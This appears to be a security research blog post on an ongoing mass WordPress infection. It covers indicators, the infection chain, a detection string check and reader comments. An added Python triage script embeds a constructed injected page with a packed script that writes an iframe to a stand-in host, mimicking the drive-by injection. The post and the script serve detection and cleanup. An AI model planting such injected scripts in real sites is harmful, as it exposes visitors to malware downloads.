Mass WordPress infection ongoing--most malicious domains using

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
To peer researchers: As we all know, researching security incidents takes a lot of time and sacrifice; as if they know exactly how to make our lives harder, attackers often launch right before the weekend or a long vacation. In such an event, we often need to sacrifice our personal plans to be with our families in order to research and publish threats fast enough.

In the past, usually right after we published our blog post and tweeted the link, some other security blogs would very quickly put out a post regarding the same incident. Usually there was a link to our original post, and we appreciate this very much.

However, recently, for some of our posts, we feel our content was plainly copied and there was no credit linking to us. We sincerely hope this won't happen again.

Together as a security community, we have a common goal--to make the Internet a safer place for everyone. It's an honor to be a part of this community, and we have a lot of respect for everyone involved. We just don't like the feeling of being taken advantage of. Thanks very much everyone!

We've been tracking an ongoing mass WordPress infection that began around Oct 5th, as detected by our HackAlert Website monitoring service. Many WordPress sites have been hit. Using as an example, we've created a video showing how an affected WordPress site can infect its visitors.

1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe a combination of a) stolen WordPress passwords, b) backdoors left in previously compromised WordPress websites, and c) automated script-injection tools that work in combination with either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware samples are installed (dropped) onto visitors' machines without their knowledge. The antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: Many WordPress websites have been hit; a sample list is as follows:

7. Malicious domains: This time, instead of owning the malicious domains themselves, the attackers are mostly using the dynamic DNS service provided by A sample list is as follows:

8. Malicious IPs: Although all of the above domains were resolving through, only a few IPs have been used so far, including the following:

1. (Primary IP, AS12695, Russian Federation Moscow Digital Networks Cjsc)
2. (AS25847, United States New York Smv)
3. (AS18229, India Hyderabad IP Pool For Znet)

9. Exploit pack: *NOT* BlackHole, still analyzing

10. Is your WordPress infected? A very simple check is to search your site's pages (the index page in particular) for the following strings: a) showthread b) 72241732 c) 72291731. If any of them exist, have a closer look. You can also use the HackAlert Website monitoring service to have your site monitored 24x7.


The injection has a simple chain:

1. The index page of a WordPress site is injected with a script packed with Dean Edwards' packer.
2. The JavaScript generates an iframe pointing to a malicious domain registered with
3. The browser loads the exploit pack from the malicious domain, which is hosted on a few fixed IPs including (Russia), (USA), and (India).
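The string check in item 10 and the three-step chain above can be automated. The following Python script is an added example written for this page; it is not Armorize's code and nothing in it comes from the original post. It does the item 10 check, then pulls the packed script out of the page, unpacks it with the packer's own algorithm, and extracts the iframe destination. The reason a plain string search works on a packed script is that Dean Edwards' packer stores its word dictionary in cleartext (the `'...|showthread|...'.split('|')` argument), so the identifying words survive packing. The injected page, the packed snippet, and the domain example.invalid are constructed for the example (the real domains and IPs are elided in the post); the packed snippet was produced by hand using the packer's base-62 encoding.

```python
"""Triage helpers for the injected-script chain described in the post.

Added example, not Armorize's code. The page, domain and packed payload
below are constructed for the example; they are not the campaign's own.
"""
import re

# Strings the post suggests searching for (item 10), plus the opening of
# Dean Edwards' packer bootstrap, which every packed script begins with
# (older packer versions use "e,r" instead of "e,d" as the last parameters).
INDICATORS = ("showthread", "72241732", "72291731", "eval(function(p,a,c,k,e,")

# Constructed injected index page (assumption: a minimal WordPress index page
# with the packed script appended). "example.invalid" stands in for the
# elided dynamic-DNS domain.
INJECTED_PAGE = (
    "<html><body><h1>My blog</h1>\n"
    "<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    "+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    "if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];"
    "e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}"
    "return p}('1.2(\\'<3 4=\"5://6.7/8.9?a=b\" c=0 d=0></3>\\');',62,14,"
    "'|document|write|iframe|src|http|example|invalid|showthread|php|id|72241732|width|height'"
    ".split('|'),0,{}))</script>\n"
    "</body></html>\n"
)

# The four arguments of the packer call: packed source p, radix a, word count c,
# and the '|'-separated dictionary k. Single-quoted literals may contain \' and \\.
PACKED_RE = re.compile(
    r"\}\('(?P<p>(?:\\.|[^'\\])*)',\s*(?P<a>\d+),\s*(?P<c>\d+),"
    r"\s*'(?P<k>(?:\\.|[^'\\])*)'\.split\('\|'\)"
)
_JS_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}


def find_indicators(html):
    """Return the indicator strings present in a page (the post's item 10 check)."""
    return [s for s in INDICATORS if s in html]


def extract_packed_scripts(html):
    """Return every packer bootstrap call found in the page, verbatim."""
    return [m.group(0) for m in re.finditer(
        r"eval\(function\(p,a,c,k,e,[dr]\).*?\.split\('\|'\),0,\{\}\)\)", html, re.S)]


def js_unescape(s):
    """Undo the escaping the packer applies inside its single-quoted literals."""
    return re.sub(r"\\(.)", lambda m: _JS_ESCAPES.get(m.group(1), m.group(1)), s)


def encode_token(c, a):
    """The packer's e() function: index c written in base a, digits 0-9 a-z A-Z."""
    prefix = "" if c < a else encode_token(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else "0123456789abcdefghijklmnopqrstuvwxyz"[c])


def unpack_dean_edwards(packed):
    """Recover the original script from a packer bootstrap call, or None."""
    m = PACKED_RE.search(packed)
    if not m:
        return None
    p = js_unescape(m.group("p"))
    a, count = int(m.group("a")), int(m.group("c"))
    k = js_unescape(m.group("k")).split("|")
    # Mirror the bootstrap's dictionary branch: every \w+ token in p is an
    # encoded index; an empty dictionary entry means the token stands for itself.
    table = {}
    for c in range(count):
        tok = encode_token(c, a)
        table[tok] = k[c] if c < len(k) and k[c] else tok
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), p)


def iframe_urls(js):
    """Pull the src of any <iframe> tag the unpacked script writes out."""
    return re.findall(r"<iframe[^>]*?\bsrc=[\"']?([^\"'\s>]+)", js, re.I)


def triage(html):
    """Item 10 string check, then unpack each packed script and list iframe targets."""
    report = {"indicators": find_indicators(html), "iframes": []}
    for packed in extract_packed_scripts(html):
        unpacked = unpack_dean_edwards(packed)
        if unpacked:
            report["iframes"].extend(iframe_urls(unpacked))
    return report


if __name__ == "__main__":
    print(triage(INJECTED_PAGE))
```

Two caveats when running this over a real document root: the packer bootstrap alone is not proof of compromise, since legitimate themes and plugins ship packed JavaScript, so judge by what the unpacked script does (an iframe to a host you do not own is the tell); and the three strings from item 10 only catch the variants seen so far, so any packed script you did not put there deserves the same unpacking treatment.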

Below is an example of an injected script:

Depending on the browsing platform used, several malicious binaries are dropped upon successful exploitation. At the time of this writing, the antivirus detection rate is 5 out of 43 vendors on VirusTotal:


Julien said...

You have saved my life guy!!!

Scumlabs said...

How do we fix it?..

GaiaLogic said...

While it's fantastic that I now know what it is and what it does, how about telling us all how to locate and remove it? I see a lot of people out there talking about this, but no one seems to be able to tell us noobs how to deal with it.
This is why these things continue to happen on a massive scale: it takes us months to find an effective solution because all the people discussing it either think we should all know how to deal with it or just can't be bothered to explain it!
Tell people how to fix these things, then maybe we wouldn't be seeing all of these.

Then again, maybe it serves some that millions of people don't know?

Andrew said...

This exploit's PHP contents are here:
They seem to like to use timthumb.php as a method for injecting their code (most likely other known exploits as well), so make sure you have the newest version of that file as well as all the security updates installed!

JF Agno said...

I'm one of the infected in the list, but I think I have removed it. How should I know if I'm still infected?
